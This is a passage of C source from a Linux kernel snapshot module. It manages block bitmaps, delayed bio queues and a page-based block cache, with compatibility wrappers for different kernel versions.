#elif defined(HAVE_BDEV_FREEZE)
		bdev_thaw(s->s_bdev);
#else
		thaw_bdev(s->s_bdev);
#endif
	} else {
		if (s->s_sb)
			sn_drop_super(s->s_sb);
	}
	s->s_sb = NULL;
}

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,23)
typedef void* (*sn_blkcache_ctor_t)(void*);

static void *sn_blkcache_ctor_1bppage(void *mem)
{
	return memset(mem, 0, sizeof(struct sa_page));
}

static void *sn_blkcache_ctor_2bppage(void *mem)
{
	return memset(mem, 0, sizeof(struct sa_page) + sizeof(unsigned long long) * 1);
}

static void *sn_blkcache_ctor_4bppage(void *mem)
{
	return memset(mem, 0, sizeof(struct sa_page) + sizeof(unsigned long long) * 3);
}

static sn_blkcache_ctor_t sn_get_blkcache_ctor(unsigned int bppage)
{
	switch(bppage) {
		case 1:
			return sn_blkcache_ctor_1bppage;
		case 2:
			return sn_blkcache_ctor_2bppage;
		case 4:
			return sn_blkcache_ctor_4bppage;
	};
	return NULL;
}
#endif

static int sn_is_error_bio(struct bio *bio)
{
#ifdef HAVE_BIO_UPTODATE
	return !test_bit(BIO_UPTODATE, &bio->bi_flags);
#elif defined(HAVE_BIO_BI_ERROR)
	return bio->bi_error;
#else
	return bio->bi_status;
#endif
}

static void sn_submit_bio(int rw, struct bio *bio)
{
#ifdef HAVE_SUBMIT_BIO_ONEARG
#ifdef HAVE_BIO_SET_OP_ATTRS
	bio_set_op_attrs(bio, rw, 0);
#else
	bio->bi_opf = rw;
#endif
	submit_bio(bio);
#else
	submit_bio(rw, bio);
#endif
}

static int sn_op_is_write(struct bio *bio)
{
#ifndef HAVE_OP_IS_WRITE
	return bio->bi_rw & REQ_WRITE;
#else
	return op_is_write(bio_op(bio));
#endif
}

#ifdef HAVE_BDOPS_SUBMIT_BIO
static sn_request_queue* sn_bio_queue(struct bio *bio)
{
#ifndef HAVE_BIO_BI_BDEV
	return bio->bi_disk->queue;
#else
	return bio->bi_bdev->bd_disk->queue;
#endif
}
#endif

/*
 * Add request to back of pending list
 */
static void pqueue_add_request(struct pending_queue *pq, struct pending_request
			*preq)
{
	if (pq->pq_reqtail) {
		pq->pq_reqtail->pr_next = preq;
		pq->pq_reqtail = preq;
	} else
		pq->pq_req = pq->pq_reqtail = preq;
}

/*
 * Grab first pending request
 */
static struct pending_request *pqueue_get_request(struct pending_queue *pq)
{
	struct pending_request *preq = pq->pq_req;
	if (preq) {
		if (preq == pq->pq_reqtail)
			pq->pq_reqtail = NULL;
		pq->pq_req = preq->pr_next;
		preq->pr_next = NULL;
	}
	return preq;
}

static inline int blkmap_release_pages(struct session_struct *s,
		struct page **page_ptr)
{
	unsigned int count;
	unsigned int i;

	for (i = 0, count = 0; i < REFS_PER_PAGE; i++, page_ptr++) {
		struct page *page;

		page = *page_ptr;
		if (unlikely(!page))
			continue;
		page_cache_release(page);
		inc_put_pages(s);
		count++;
	}
	return count;
}

static void do_block_map_destroy(struct session_struct *s,
				struct block_map *bmap)
{
	unsigned long long bsize;
	unsigned int pages, mpages;
	struct page *page;
	unsigned int i;

	if (!bmap->blkmap)
		return;
	bsize = sn_round(bmap->size, 8);
	pages = sn_round(bsize, PAGE_SIZE);
	/* pages with pointers to pages */
	mpages = sn_round(pages, REFS_PER_PAGE);

	for (i = 0; i < mpages; i++) {
		page = bmap->blkmap[i];
		if (unlikely(!page))
			break;
		sa_debug(DEBUG_BMAP, "s=%p, mpage(%u,%p,%p)\n",
					s, i, page, page_address(page));
		blkmap_release_pages(s, page_address(page));
		page_cache_release(page);
		inc_put_pages(s);
	}
	kfree(bmap->blkmap);
	bmap->blkmap = NULL;
	bmap->size = 0;
	bmap->rsize = 0;
	return;
}

static void noinline block_map_destroy(struct session_struct *s)
{
	do_block_map_destroy(s, &s->s_blkmap);
#ifdef CATCH_ILLEGAL_ACCESS
	do_block_map_destroy(s, &s->s_blkmap_backup);
#endif
	return;
}

static inline unsigned int blkmap_high_pages(struct session_struct * s,
		struct page **page_ptr, unsigned n)
{
	struct page *p;
	unsigned int count;

	for (count = 0; count < n; page_ptr++, count++) {
		p = alloc_page(GFP_HIGHUSER);
		if (unlikely(!p))
			return count;

		inc_get_pages(s);
		*page_ptr = p;
	}
	return count;
}

static int blkmap_alloc_pages(struct session_struct * s, struct page **blkmap,
					unsigned pages)
{
	struct page *p;
	unsigned int i, count, hpages;

	for (i = 0; i < pages; i += REFS_PER_PAGE, blkmap++) {
		p = alloc_page(GFP_KERNEL);
		if (unlikely(!p))
			goto out_free;
		memset(page_address(p), 0, PAGE_SIZE);
		*blkmap = p;
		sa_debug(DEBUG_BMAP, "s=%p, mpage(%u,%p,%p)\n",
			s, i, p, page_address(p));
		inc_get_pages(s);
		hpages = (i + REFS_PER_PAGE < pages) ? REFS_PER_PAGE :
							pages - i;
		count = blkmap_high_pages(s, page_address(p), hpages);
		if (count != hpages)
			goto out_free;
	}
	return 0;

out_free:
	block_map_destroy(s);
	return -ENOMEM;
}

static inline struct page * blkmap_page(struct page **blkmap,
				unsigned int pageno)
{
	struct page **mpage;

	mpage = page_address(blkmap[pageno >> REFS_PER_PAGE_SHIFT]);
	return mpage[pageno & (~REFS_PER_PAGE_MASK)];
}

static void blkmap_page_release(struct page **blkmap, unsigned int pageno)
{
	struct page **mpage;
	struct page *page;
	unsigned int idx;

	mpage = page_address(blkmap[pageno >> REFS_PER_PAGE_SHIFT]);
	idx = pageno & (~REFS_PER_PAGE_MASK);
	page = mpage[idx];
	mpage[idx] = 0;
	page_cache_release(page);
}

static int noinline block_map_init(struct session_struct *s,
			unsigned long long size, char *data, int optimize)
{
	struct block_map *bmap;
	unsigned long long bsize;
	unsigned int count, pages, mpages, i;
	int ret, bexists;
	struct page * tpage;
	void * tpageaddr;

	sa_debug(DEBUG_API, "s=%p, size=%llu, data=%p mode=%d\n", s, size,
						data, optimize);
	bsize = sn_round(size, 8);
	if (!bsize)
		return -EINVAL;

	tpage = NULL;
	tpageaddr = NULL;
	ret = -ENOMEM;
	bexists = 0;
	pages = sn_round(bsize, PAGE_SIZE);
	mpages = sn_round(pages, REFS_PER_PAGE);

	bmap = &s->s_blkmap;
	if (bmap->size) {
		if (unlikely(bmap->size < size))
			return -EINVAL;
		bexists = 1;
		/* it may be we load data into larger bitmap,
		   rsize keeps real data size */
		bmap->rsize = size;
	}
	if (!bmap->blkmap) {
		size_t memsize;

		memsize = mpages * sizeof(struct page *);
		bmap->blkmap = kmalloc(memsize, GFP_KERNEL);
		if (unlikely(!bmap->blkmap))
			return ret;
		memset(bmap->blkmap, 0, memsize);
		bmap->size = size;
		bmap->rsize = size;
	}
	if (data) {
		tpage = alloc_page(GFP_KERNEL);
		if (unlikely(!tpage)) {
			kfree(bmap->blkmap);
			bmap->blkmap = NULL;
			bmap->size = 0;
			bmap->rsize = 0;
			return ret;
		}
		tpageaddr = page_address(tpage);
		inc_get_pages(s);
	}
	sa_debug(DEBUG_BMAP, "size=%llu, blkmap=%p, pages=%u, mpages=%u\n",
			size, bmap->blkmap, pages, mpages);
	if (!bexists) {
		if (unlikely(blkmap_alloc_pages(s, bmap->blkmap, pages)))
			goto out_free;
	}
	count = PAGE_SIZE;
	for (i = 0; i < pages; i++, data += PAGE_SIZE) {
		char *kaddr;
		struct page *p;

		if (unlikely((i == pages - 1) && (bsize & (PAGE_SIZE - 1))))
			/* Don't touch count if bsize%PAGE_SIZE == 0 */
			count = bsize & (PAGE_SIZE - 1);

		if (tpageaddr) {
			ret = copy_from_user(tpageaddr, data, count);
			if (unlikely(ret)) {
				sa_warn("copy_from_user failed. data=%p, "
					"count=%d, bsize=%llu.\n", data, count,
					bsize);
				ret = -EACCES;
				goto out_free;
			}
			if (optimize) {
				int fbit;
				fbit = find_first_bit(tpageaddr, PAGE_SIZE << 3);
				if (unlikely(fbit == PAGE_SIZE << 3)) {
					blkmap_page_release(bmap->blkmap, i);
					inc_put_pages(s);
					sa_debug(DEBUG_BMAP, "empty %u\n", i);
				}
			}
		}
		p = blkmap_page(bmap->blkmap, i);
		if (p) {
			kaddr = sn_kmap_atomic(p);
			if (!tpageaddr)
				memset(kaddr, 0xff, count);
			else
				memcpy(kaddr, tpageaddr, count);
			sn_kunmap_atomic(kaddr);
		}
	}

	if (tpage) {
		page_cache_release(tpage);
		inc_put_pages(s);
	}
	return 0;

out_free:
	block_map_destroy(s);
	if (tpage) {
		page_cache_release(tpage);
		inc_put_pages(s);
	}
	return ret;
}

#ifdef USE_VZ_VZSNAP
static int noinline block_map_init_vzsnap(struct session_struct *s,
					  struct vzsnap_struct *vzs)
{
	struct block_map *bmap;
	unsigned long long size = vzs->block_max;
	unsigned long long bsize;
	unsigned int pages;
	int i, ret;

	bsize = (size + 7) / 8;

	bmap = &s->s_blkmap;
	ret = -ENOMEM;
	memset(bmap, 0, sizeof(*bmap));
	pages = (bsize + PAGE_SIZE - 1) >> PAGE_SHIFT;
	bmap->blkmap = kmalloc(pages * sizeof(struct page *), GFP_KERNEL);
	if (!bmap->blkmap)
		return ret;
	memset(bmap->blkmap, 0, pages * sizeof(struct page *));
	bmap->size = size;
	bmap->rsize = size;
#ifdef CATCH_ILLEGAL_ACCESS
	s->s_blkmap_backup.blkmap = kzalloc(pages * sizeof(struct page *), GFP_KERNEL);
	if (!s->s_blkmap_backup.blkmap)
		return ret;
	s->s_blkmap_backup.size = size;
	s->s_blkmap_backup.rsize = size;
#endif
	for (i = 0; i < pages; i++) {
		if (!vzs->block_map[i])
			continue;
		struct page **mpage;
		struct page **pg = bmap->blkmap + (i >> REFS_PER_PAGE_SHIFT);
		if (!*pg) {
			*pg = alloc_page(GFP_KERNEL|__GFP_ZERO);
			if (!*pg)
				return -ENOMEM;
			}

		get_page(vzs->block_map[i]);
		mpage = page_address(*pg);
		mpage[i & (~REFS_PER_PAGE_MASK)] = vzs->block_map[i];
#ifdef CATCH_ILLEGAL_ACCESS
		pg = bmap->blkmap_backup.blkmap + (i >> REFS_PER_PAGE_SHIFT);
		if (!*pg) {
			*pg = alloc_page(GFP_KERNEL|GFP_ZERO);
			if (!*pg)
				return -ENOMEM;
		}
		mpage = page_address(*pg);
		mpage[i & (~REFS_PER_PAGE_MASK)] = alloc_page(GFP_KERNEL);
		memcpy(page_address(mpage[i & (~REFS_PER_PAGE_MASK)]),
		       page_address(bmap->blkmap[i]), PAGE_SIZE);
#endif
	}
	return 0;
}
#endif

static inline int is_block_in_map(struct block_map *bmap,
					unsigned long long bno)
{
	unsigned int pageno;
	struct page *page;
	long *kaddr;
	int ret;

	if (bno >= bmap->rsize)
		return 0;

	pageno = bno >> (PAGE_SHIFT + 3);
	page = blkmap_page(bmap->blkmap, pageno);
	if (!page)
		return 0;
	kaddr = sn_kmap_atomic(page);
	ret = test_bit(bno % (PAGE_SIZE * 8), kaddr);
	sn_kunmap_atomic(kaddr);

	return ret;
}

static inline int clear_block_in_map(struct block_map *bmap,
					unsigned long long bno)
{
	unsigned int pageno;
	struct page *page;
	long *kaddr;
	int ret;

	if (bno >= bmap->rsize)
		return 1;

	pageno = bno >> (PAGE_SHIFT + 3);
	page = blkmap_page(bmap->blkmap, pageno);
	if (!page)
		return 1;
	kaddr = sn_kmap_atomic(page);
	ret = test_and_clear_bit(bno % (PAGE_SIZE * 8), kaddr);
	sn_kunmap_atomic(kaddr);
	return ret;
}

static inline void set_block_in_map(struct block_map *bmap,
					unsigned long long bno)
{
	unsigned int pageno;
	struct page *page;
	long *kaddr;

	if (bno >= bmap->rsize)
		return;

	pageno = bno >> (PAGE_SHIFT + 3);
	page = blkmap_page(bmap->blkmap, pageno);
	if (!page)
		return;
	kaddr = sn_kmap_atomic(page);
	set_bit(bno % (PAGE_SIZE * 8), kaddr);
	sn_kunmap_atomic(kaddr);
}

#define BITS_ON_PAGE (1 << (PAGE_SHIFT+3))

static unsigned long long find_next_block(struct block_map *bmap, unsigned long long bno)
{
	unsigned int lpage; /* last pageno */
	unsigned int pageno;
	unsigned int psize; /* processing page size */

	if (bno >= bmap->rsize)
		return ~0ULL; /* goto out_end; */
	psize = BITS_ON_PAGE;
	lpage = (bmap->size - 1) >> (PAGE_SHIFT + 3);
	pageno = bno >> (PAGE_SHIFT + 3);
	bno &= BITS_ON_PAGE - 1;

	for (; pageno <= lpage; pageno++) {
		void* kaddr;
		struct page* page;

		if (pageno == lpage) {
			psize = bmap->size & ((PAGE_SIZE << 3) - 1);
			if (!psize)
				psize = BITS_ON_PAGE;
		}
		page = blkmap_page(bmap->blkmap, pageno);
		if (!page)
			continue;
		kaddr = sn_kmap_atomic(page);
		bno = find_next_bit(kaddr, psize, bno);
		sn_kunmap_atomic(kaddr);
		if (bno < psize) {
			bno += (unsigned long long)pageno << (PAGE_SHIFT + 3);
			goto out;
		}
		bno = 0;
	}

	bno = ~0ULL;
out:
	return bno;
}

#define snapapi_is_not_our_bio(s, bio) \
		(sn_bio_bi_sector(bio) + (sn_bio_bi_size(bio) >> 9) < s->s_pstart || \
		sn_bio_bi_sector(bio) >= s->s_pstart + s->s_plen)
#if 0
static struct session_struct *find_by_part(struct bio *bio)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list) {
		if (s->s_state == SNAP_NOTINITED)
			continue;
		if ((s->s_bdev->bd_contains == bio->bi_bdev ||
				s->s_bdev == bio->bi_bdev)
				&& !snapapi_is_not_our_bio(s, bio))
			return s;
	}
	return NULL;
}

static inline struct session_struct *find_by_dev(struct block_device *bd)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list)
		if (s->s_bdev && (s->s_bdev->bd_contains == bd
						|| s->s_bdev == bd))
			return s;
	return NULL;
}
#endif
#ifdef HAVE_BDOPS_SUBMIT_BIO
static inline struct session_struct *find_by_fops(const struct block_device_operations *fops)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list)
		if (s->s_request_queue && s->s_bdev && (s->s_bdev->bd_disk->fops == fops))
			return s;
	return NULL;
}

static inline struct session_struct *find_by_fops_next(const struct block_device_operations *fops, struct session_struct *s)
{
	list_for_each_entry_continue(s, &sessions_list, s_list)
		if (s->s_request_queue && s->s_bdev && (s->s_bdev->bd_disk->fops == fops)) {
			return s;
		}
	return NULL;
}
#endif
static inline struct session_struct *find_by_queue(struct bio *bio, void *q)
{
	struct session_struct *s;
	list_for_each_entry(s, &sessions_list, s_list)
		if (s->s_request_queue == q)
			return s;
	return NULL;
}

static inline struct session_struct *find_by_queue_next(struct bio *bio,
			void *q, struct session_struct *s)
{
	list_for_each_entry_continue(s, &sessions_list, s_list)
		if (s->s_request_queue == q)
			return s;
	return NULL;
}

static inline struct session_struct *find_deadlocked(void)
{
	struct list_head *tmp;
	list_for_each(tmp, &sessions_list) {
		struct session_struct *s;
		s = list_entry(tmp, struct session_struct, s_list);
		sa_info("dev=%x state=%d\n", s->s_kdev, s->s_state);
		if (s->s_state == SNAP_DEADLOCK_ERR)
			return s;
	}
	return NULL;
}

#if 0
static int make_original_request(struct bio *bio)
{
	sn_request_queue *q;
	do {
		q = bdev_get_queue(bio->bi_bdev);
		if (!q) {
			/*
			 * This is very sad situation. Bio can't be
			 * handled properly, but we have call end_io
			 * because nobody will do it for us.
			 */
			sa_error("Device %x does not have a queue.\n",
				bio->bi_bdev->bd_dev);
			sn_bio_io_error(bio, sn_bio_bi_size(bio));
			return 1;
		}
	} while (q->make_request_fn(q, bio));
	return 0;
}
#endif

/* must be called with s_biolist_lock held*/
static void noinline flush_biolist_locked(struct session_struct * s)
{
	int pno, offset;
	struct bio *bio;

	if (!s->s_bioarr)
		return;

	while (s->s_biocount) {
		s->s_biocount--;
		pno = s->s_biocount / REFS_PER_PAGE;
		offset = s->s_biocount % REFS_PER_PAGE;
		bio = *(s->s_bioarr[pno] + offset);
		spin_unlock(&s->s_biolist_lock);
		generic_make_request(bio);
		spin_lock(&s->s_biolist_lock);
		sa_debug(DEBUG_BIO, "request sent, bh=%p\n", bio);
	}
	while (s->s_biopages) {
		pno = s->s_biopages - 1;
		free_page((unsigned long)s->s_bioarr[pno]);
		inc_put_pages(s);
		s->s_bioarr[pno] = NULL;
		s->s_biopages--;
	}
}

static void noinline flush_biolist(struct session_struct * s)
{
	spin_lock(&s->s_biolist_lock);
	flush_biolist_locked(s);
	spin_unlock(&s->s_biolist_lock);
}

static void noinline cleanup_biolist(struct session_struct * s)
{
	spin_lock(&s->s_biolist_lock);
	if (s->s_bioarr) {
		flush_biolist_locked(s);
		sa_debug(DEBUG_BIOQUE, "Free bioarr page=%p\n", s->s_bioarr);
		free_page((unsigned long)s->s_bioarr);
		inc_put_pages(s);
		s->s_bioarr = NULL;
	}
	spin_unlock(&s->s_biolist_lock);
}

static int noinline delay_bio(struct session_struct *s, struct bio *bio)
{
	int pno, idx;
	struct bio **bioptr;

	sa_debug(DEBUG_BIO, "delayed bio=%p\n", bio);

	spin_lock(&s->s_biolist_lock);
	if (s->s_biocount > MAX_BH_DELAYED - 1) {
		spin_unlock(&s->s_biolist_lock);
		sa_warn("No space for bio, count=%d.\n", s->s_biocount);
		return 1;
	}
	pno = s->s_biocount / REFS_PER_PAGE;
	idx = s->s_biocount % REFS_PER_PAGE;
	if (!s->s_bioarr[pno]) {
		s->s_bioarr[pno] = (struct bio **) get_zeroed_page(GFP_ATOMIC);
		if (!s->s_bioarr[pno]) {
			spin_unlock(&s->s_biolist_lock);
			sa_warn("No memory for bio queue, count=%d.\n",
							s->s_biocount);
			return 1;
		}
		inc_get_pages(s);
		s->s_biopages++;
	}
	bioptr = s->s_bioarr[pno];
	*(bioptr + idx) = bio;
	s->s_biocount++;
	s->s_dbios++;
	spin_unlock(&s->s_biolist_lock);

	return 0;
}
static void cleanup_chain(struct session_struct *s,
		struct sa_chain *chain, struct sa_page *sab)
{
	struct sa_page *next;

	while (sab) {
		next = sab->next;
		s->s_blkcache_pages--;
		page_cache_release(sab->page);
		inc_put_pages(s);
		kmem_cache_free(s->s_blkcachep, sab);
		sab = next;
	}
}

static void noinline cleanup_snapshot(struct session_struct *s)
{
	struct sa_chain *chain;
	int i;

	if (!s->s_blkcachep)
		return;

	for (i = 0; i < BLK_CHAINS; i++) {
		chain = sa_get_blk_chain(s, i);
		cleanup_chain(s, chain, chain->busy);
		cleanup_chain(s, chain, chain->free);
	}

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,19)
	kmem_cache_destroy(s->s_blkcachep);
#else
        if (kmem_cache_destroy(s->s_blkcachep))
                sa_warn("Unable to destroy cache.%s", "\n");
#endif
	s->s_blkcachep = NULL;
	return;
}

static inline void insert_into_free_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	sab->next = chain->free;
	chain->free = sab;
}

static inline void insert_into_busy_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	sab->next = chain->busy;
	chain->busy = sab;
}

static inline void remove_from_free_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	chain->free = sab->next;
}

static inline void remove_from_busy_list(struct sa_chain *chain,
			struct sa_page *sab)
{
	chain->busy = sab->next;
}

static inline int find_free_on_page(struct sa_page *sab, int bppage,
							unsigned long long bno)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0; i < bppage; i++, bno_p++)
		if (*bno_p == ~0ULL) {
			/* mark as busy */
			*bno_p = bno;
			return i;
		}
	sa_BUG("Busy page in free list(%p).\n", sab);
	return 0;
}

static inline int blocks_on_page(struct sa_page *sab, int bppage)
{
	int i, count;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0, count = 0; i < bppage; i++, bno_p++)
		if (*bno_p != ~0ULL)
			count++;
	return count;
}

static inline int find_block_on_page(struct sa_page *sab, int bppage,
							unsigned long long bno)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0; i < bppage; i++, bno_p++)
		if (*bno_p == bno)
			return i;
	return i;
}

static inline void free_block_on_page(struct sa_page *sab, int idx)
{
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	/* mark as free */
	*(bno_p + idx) = ~0ULL;
}

static struct sa_page * find_block_in_chain(struct sa_page *sab, int bppage,
			unsigned long long bno, int *idx, struct sa_page **prev, unsigned long long* sdepth)
{
	struct sa_page *p;

	p = NULL;
	while (sab) {
		*idx = find_block_on_page(sab, bppage, bno);
		*sdepth += *idx;
		if (*idx != bppage) {
			if (p)
				*prev = p;
			break;
		}
		p = sab;
		sab = sab->next;
	}
	return sab;
}

static inline void init_sa_page(struct sa_page *sab, int bppage)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	bno_p++;
	for (i = 1; i < bppage; i++, bno_p++)
		*bno_p = ~0ULL;
}

static unsigned long long any_block_on_page(struct sa_page *sab, int bppage)
{
	int i;
	unsigned long long * bno_p;

	bno_p = &sab->bno;
	for (i = 0; i < bppage; i++, bno_p++)
		if (*bno_p != ~0ULL)
			return *bno_p;
	return ~0ULL;
}

static unsigned long long any_block_in_cache(struct session_struct *s)
{
	struct sa_chain *chain;
	int i, idx;
	unsigned long long ret;

	idx = 0;
	ret = ~0ULL;
	if (s->s_blkcache_pages == 0)
		return ret;
	for (i = 0; i < BLK_CHAINS; i++) {
		idx = sa_get_blk_chain_index(s->s_anyblk_chain + i);
		chain = sa_get_blk_chain(s, idx);
		spin_lock(&chain->lock);
		if (chain->busy) {
			ret = chain->busy->bno;
			spin_unlock(&chain->lock);
			break;
		}
		if (chain->free) {
			ret = any_block_on_page(chain->free, s->s_bppage);
			spin_unlock(&chain->lock);
			break;
		}
		spin_unlock(&chain->lock);
	}
	s->s_anyblk_chain = sa_get_blk_chain_index(idx + 1);
	return ret;
}

static int sa_cache_emlist_init(struct session_struct *s, int prealloc)
{
	struct sa_page *sab;
	int ret, i, delta;

	delta = snap_emergency_size >> 4;
	s->s_blkcache_emmin = snap_emergency_size - delta;
	if (!prealloc)
		return 0;

	ret = -ENOMEM;
	for (i = 0; i < snap_emergency_size; i++) {
		unsigned long tm = jiffies + msecs_to_jiffies(MEM_ALLOC_TM) + 1;
		sab = (struct sa_page *)kmem_cache_alloc(s->s_blkcachep,
						GFP_KERNEL);
		if (!sab)
			goto out;
		s->s_blkcache_empages++;
		sab->page = alloc_page(GFP_HIGHUSER);
		if (!sab->page) {
			kmem_cache_free(s->s_blkcachep, sab);
			goto out;
		}
		inc_get_pages(s);
		sab->next = s->s_blk_emlist;
		s->s_blk_emlist = sab;
		if (time_after(jiffies, tm)) {
	 		sa_warn("Note, continue with %d pages.\n",
						s->s_blkcache_empages);
			break;
		}
	}
	ret = 0;

out:
	return ret;
}

static struct sa_page * sa_cache_emget(struct session_struct *s)
{
	struct sa_page *sab;

	sab = NULL;
	spin_lock(&s->s_blkcache_emlock);
	if (s->s_blkcache_empages > s->s_blkcache_emmin) {
		sab = s->s_blk_emlist;
		s->s_blk_emlist = sab->next;
		s->s_blkcache_empages--;
		s->s_blkcache_pages++;
		goto out_unlock;
	}
	spin_unlock(&s->s_blkcache_emlock);

	sab = (struct sa_page *)kmem_cache_alloc(s->s_blkcachep, GFP_ATOMIC);
	if (!sab)
		goto get_from_list;
	sab->page = alloc_page(GFP_SNAPHIGH);
	if (!sab->page) {
		kmem_cache_free(s->s_blkcachep, sab);
		goto get_from_list;
	}
	inc_get_pages(s);
	s->s_blkcache_pages++;
	goto out;

get_from_list:
	spin_lock(&s->s_blkcache_emlock);
	sab = s->s_blk_emlist;
	if (sab) {
		s->s_blk_emlist = sab->next;
		s->s_blkcache_empages--;
		s->s_blkcache_pages++;
	}

out_unlock:
	spin_unlock(&s->s_blkcache_emlock);
out:
	return sab;
}

static void sa_cache_emput(struct session_struct *s, struct sa_page *sab)
{
	spin_lock(&s->s_blkcache_emlock);
	s->s_blkcache_pages--;
	if (s->s_blkcache_empages < snap_emergency_size) {
		sab->next = s->s_blk_emlist;
		s->s_blk_emlist = sab;
		s->s_blkcache_empages++;
		spin_unlock(&s->s_blkcache_emlock);
		return;
	}
	spin_unlock(&s->s_blkcache_emlock);
	page_cache_release(sab->page);
	inc_put_pages(s);
	kmem_cache_free(s->s_blkcachep, sab);
}

static void sa_cache_emlist_destroy(struct session_struct *s)
{
	struct sa_page *sab;

	spin_lock(&s->s_blkcache_emlock);
	while (s->s_blk_emlist) {
		sab = s->s_blk_emlist;
		s->s_blk_emlist = sab->next;
		s->s_blkcache_empages--;
		spin_unlock(&s->s_blkcache_emlock);

		page_cache_release(sab->page);
		inc_put_pages(s);
		kmem_cache_free(s->s_blkcachep, sab);
		spin_lock(&s->s_blkcache_emlock);
	}
	spin_unlock(&s->s_blkcache_emlock);
}

static inline void sa_update_session_rc_depth_stats(struct session_struct *s, unsigned long long sdepth)
{
	if (sdepth > s->s_maxrcdepth)
		s->s_maxrcdepth = sdepth;
	if (sdepth > SNAP_RCDEPTH0) {
		s->s_rcdepthcnt[0]++;
		if (sdepth > SNAP_RCDEPTH1) {
			s->s_rcdepthcnt[1]++;
			if (sdepth > SNAP_RCDEPTH2) {
				s->s_rcdepthcnt[2]++;
				if (sdepth > SNAP_RCDEPTH3) {
					s->s_rcdepthcnt[3]++;
				}
			}
		}
	}
}

static int sa_cache_chain_read(struct session_struct *s, struct sa_chain* chain,
		void *data, unsigned long long bno, int mode, unsigned int flags)
{
	struct sa_page *prev;
	struct sa_page **head;
	struct sa_page *sab;
	int idx, bppage, ret;
	char *kaddr;
	unsigned long long sdepth;

	s->s_rccalls++;
	ret = 0;
	sdepth = 0;
	bppage = s->s_bppage;
	idx = 0;
	prev = NULL;
	head = &chain->busy;
	sab = find_block_in_chain(chain->busy, bppage, bno, &idx, &prev, &sdepth);
	if (sab)
		goto copy_data;

	prev = NULL;
	head = &chain->free;
	sab = find_block_in_chain(chain->free, bppage, bno, &idx, &prev, &sdepth);
	if (sab)
		goto copy_data;
	/* not found */
	goto out;

copy_data:
	if (mode == FAKE_READ)
		goto arrange_lists;
	kaddr = sn_kmap_atomic(sab->page);
	memcpy(data, kaddr + idx * s->s_bsize, s->s_bsize);
	sn_kunmap_atomic(kaddr);
	s->s_rcblocks++;

arrange_lists:
	sa_debug(DEBUG_CACHE, "mode=%d flags=%u bno=%llu\n", mode, flags, bno);
	ret = s->s_bsize;
	if (!(flags & SNAP_READ_ONCE))
		goto out;
	s->s_fcblocks++;
	free_block_on_page(sab, idx);
	/* remove from list */
	if (prev)
		prev->next = sab->next;
	else
		*head = sab->next;
	if (bppage == 1 || !blocks_on_page(sab, bppage)) {
		sa_cache_emput(s, sab);
		goto out;
	}
	insert_into_free_list(chain, sab);
out:
	sa_update_session_rc_depth_stats(s, sdepth);
	return ret;
}

struct level0entry {
	unsigned long long key;
	unsigned long long value;
};

#define STOP_ENTRY(SP) 	((void*)SP->entry - page_address(SP->page) > \
			PAGE_SIZE - sizeof(struct level_entry))

static void map_free(struct session_struct* s)
{
	struct stack_entry *sp, *end;
	struct group_map* map;

	map = &s->s_groupmap;
	end = sp = map->stack + map->level;
	sp->page = map->root;
	if (sp > map->stack)
		sp->entry = page_address(sp->page);
	do {
		while (sp > map->stack) {
			sp--;
			sp->page = (sp + 1)->entry->page;
			if (sp - map->stack)
				sp->entry = page_address(sp->page);
		}
		do  {
			page_cache_release(sp->page);
			inc_put_pages(s);
			if (++sp > end)
				break;
			sp->entry++;
		} while (STOP_ENTRY(sp) || !sp->entry->page);
	} while(sp <= end);
}

static void update_ioctl_counters(struct session_struct* s)
{
	sa_debug(DEBUG_INTERNALS, "s=%p(%x)\n", s, s->s_kdev);
	s->s_simulate_tm = jiffies + IOCTL_SIM_INTERVAL;
	s->s_ioctlcnt++;
	if (s->s_pid_info)
		atomic_inc(&s->s_pid_info->sn_ioctls);
}

static void simulate_ioctl(struct session_struct* s)
{
	if (time_after(jiffies, s->s_simulate_tm))
		update_ioctl_counters(s);
}

static int map_init(struct session_struct* s, unsigned long uaddr, unsigned n)
{
	int ret;
	struct page* destpage, *bubble;
	struct stack_entry* sp, *max_sp;
	struct group_map* map;

	ret = 0;
	map = &s->s_groupmap;
	memset(map->stack, 0, sizeof(map->stack));
	max_sp = map->stack;
	bubble = 0;
	destpage = 0;
	while (n) {
		unsigned copy_count;
		unsigned copy_size;
		unsigned long long max_key;
		struct level0entry* dest;

		ret = -ENOMEM;
		destpage = alloc_page(GFP_HIGHUSER);
		if (!destpage)
			break;
		inc_get_pages(s);
		dest = (struct level0entry*)kmap(destpage);
		if (!dest)
			break;
		ret = 0;
		copy_count = PAGE_SIZE / sizeof(struct level0entry);
		while (copy_count > n)
			dest[--copy_count].key = ~0;
		copy_size = copy_count * sizeof(struct level0entry);
		if (copy_from_user(dest, (void*)uaddr, copy_size)) {
			ret = -EACCES;
			kunmap(destpage);
			break;
		}
		uaddr += copy_size;
		n -= copy_count;
		bubble = map->stack[0].page;
		max_key = map->stack[0].max_key;
		map->stack[0].page = destpage;
		map->stack[0].max_key = dest[copy_count - 1].key;
		kunmap(destpage);
		destpage = 0;
		for (sp = &map->stack[1]; bubble; sp++) {
			if (!sp->page) {
				sp->page = alloc_page(GFP_KERNEL);
				if (!sp->page) {
					ret = -ENOMEM;
					break;
				}
				inc_get_pages(s);
				sp->entry = page_address(sp->page);
			}
			sp->entry->page = bubble;
			sp->entry->max_key = sp->max_key = max_key;
			sp->entry++;
			if (STOP_ENTRY(sp)) {
				bubble = sp->page;
				sp->page = 0;
			} else {
				/*sp->entry->page = 0; ???*/
				bubble = 0;
			}
		}
		if (--sp > max_sp)
			max_sp = sp;
	}
	for (sp = &map->stack[1]; sp <= max_sp; sp++) {
		if (!sp->page) {
			sp->page = alloc_page(GFP_KERNEL);
			if (!sp->page) {
				ret = -ENOMEM;
				break;
			}
			inc_get_pages(s);
			sp->entry = page_address(sp->page);
		}
